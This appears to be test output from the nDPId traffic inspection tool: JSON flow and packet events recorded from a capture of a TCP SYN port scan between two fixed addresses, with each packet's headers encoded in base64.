-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1120,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1111,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAs0FQAACUGUx6sEAAIQA2GNIzTJXrdU4MZAAAAAGACCAALEgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1121,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1121,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1112,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsMh0AADEG5VWsEAAIQA2GNIzTH5fdU4MZAAAAAGACCAAQ9QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1122,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1122,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1113,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsi4MAADAGjO+sEAAIQA2GNIzTG8LdU4MZAAAAAGACBAAYygAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1123,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1123,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1114,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsv9UAADsGTZ2sEAAIQA2GNIzTIqndU4MZAAAAAGACEAAF4wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1124,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":89,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1124,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1115,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAskOIAAC4GiZCsEAAIQA2GNIzTAFndU4MZAAAAAGACDAAsMwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1125,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1125,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1116,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsGKMAACkGBtCsEAAIQA2GNIzTDfzdU4MZAAAAAGACCAAikAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1126,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2399,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1126,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1117,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsJZ0AAC4G9NWsEAAIQA2GNIzTCV\/dU4MZAAAAAGACDAAjLQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1127,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1127,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1118,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsJmMAADcG6w+sEAAIQA2GNIzTIyLdU4MZAAAAAGACEAAFagAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1128,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1119,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsp1gAADQGbRqsEAAIQA2GNIzTAyDdU4MZAAAAAGACBAAxbAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1129,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1129,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1120,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsNHwAAC4G5fasEAAIQA2GNIzTF9XdU4MZAAAAAGACDAAUtwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1130,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2170,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1130,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1121,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsqy4AADYGZ0SsEAAIQA2GNIzTCHrdU4MZAAAAAGACDAAkEgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1131,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1122,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAssb8AACcGb7OsEAAIQA2GNIzTBFjdU4MZAAAAAGACEAAkNAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1132,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1123,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsbzUAADkGoD2sEAAIQA2GNIzTAJDdU4MZAAAAAGACCAAv\/AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1133,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1133,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1124,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsBpUAAC4GE96sEAAIQA2GNIzTDUzdU4MZAAAAAGACDAAfQAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1134,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1533,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1134,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1125,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsewcAADYGl2usEAAIQA2GNIzTBf3dU4MZAAAAAGACDAAmjwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1135,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1117,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1135,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1126,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsb+sAACUGs4esEAAIQA2GNIzTBF3dU4MZAAAAAGACCAAsLwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1136,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1136,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1127,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAseUEAADgGlzGsEAAIQA2GNIzTA\/PdU4MZAAAAAGACBAAwmQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1137,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3325,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1137,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1128,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAs8aMAAC0GKc+sEAAIQA2GNIzTDP3dU4MZAAAAAGACCAAjjwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1138,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1129,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAspQgAADgGa2qsEAAIQA2GNIzTw1HdU4MZAAAAAGACBABxOgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1139,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1130,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsnykAADoGb0msEAAIQA2GNIzTBMHdU4MZAAAAAGACDAAnywAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1140,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1062,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1140,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1131,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsYsgAADAGtaqsEAAIQA2GNIzTBCbdU4MZAAAAAGACBAAwZgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1141,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1141,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1132,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsBCoAADcGDUmsEAAIQA2GNIzTJR\/dU4MZAAAAAGACEAADbQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1142,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1142,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1133,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsqo8AACgGdeOsEAAIQA2GNIzTF27dU4MZAAAAAGACBAAdHgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1143,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1143,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1134,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsdGkAADkGmwmsEAAIQA2GNIzTIyrdU4MZAAAAAGACCAANYgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1144,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 